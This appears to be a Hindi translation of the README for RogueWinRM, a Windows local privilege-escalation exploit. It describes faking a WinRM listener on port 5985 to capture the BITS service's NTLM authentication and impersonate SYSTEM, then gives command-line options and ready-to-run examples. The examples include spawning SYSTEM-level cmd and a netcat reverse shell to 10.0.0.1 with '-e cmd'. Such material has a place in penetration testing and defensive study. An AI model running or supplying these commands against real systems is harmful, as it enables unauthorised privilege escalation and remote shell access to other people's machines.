
सेवा खाते से सिस्टम तक विंडोज स्थानीय विशेषाधिकार वृद्धि
RogueWinRM एक स्थानीय विशेषाधिकार वृद्धि शोषण है जो सेवा खाते (SeImpersonatePrivilege के साथ) से स्थानीय सिस्टम खाते में वृद्धि करने की अनुमति देता है यदि WinRM सेवा चल रही नहीं है (Win10 पर डिफ़ॉल्ट लेकिन Windows Server 2019 पर नहीं)।
संक्षेप में, यह पोर्ट 5985 पर आने वाले कनेक्शन के लिए सुनता है, एक वास्तविक WinRM सेवा का नकली रूप धारण करता है।
यह एक न्यूनतम वेबसर्वर है जो उस पोर्ट पर कनेक्ट करने का प्रयास करने वाली किसी भी सेवा के साथ NTLM प्रमाणीकरण पर बातचीत करने का प्रयास करेगा।
फिर BITS सेवा (स्थानीय सिस्टम के रूप में चल रही) ट्रिगर होती है और वह हमारे नकली लिसनर पर प्रमाणित करने का प्रयास करेगी। हमारे नकली लिसनर पर प्रमाणित होने के बाद, हम स्थानीय सिस्टम उपयोगकर्ता का प्रतिरूपण कर सकते हैं और उन विशेषाधिकारों के साथ एक मनमाना प्रक्रिया उत्पन्न कर सकते हैं।
आप इस भेद्यता का पूर्ण तकनीकी विवरण इस लिंक पर पा सकते हैं --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
अनिवार्य तर्क:
-p <प्रोग्राम>: लॉन्च करने के लिए प्रोग्राम
वैकल्पिक तर्क:
-a <तर्क>: प्रोग्राम को पास करने के लिए कमांड लाइन तर्क (डिफ़ॉल्ट NULL)
-l <पोर्ट>: सुनने वाला पोर्ट (डिफ़ॉल्ट 5985 WinRM)
-d : डिबगिंग आउटपुट सक्षम करें

एक इंटरैक्टिव cmd चलाना:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Netcat रिवर्स शेल चलाना:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"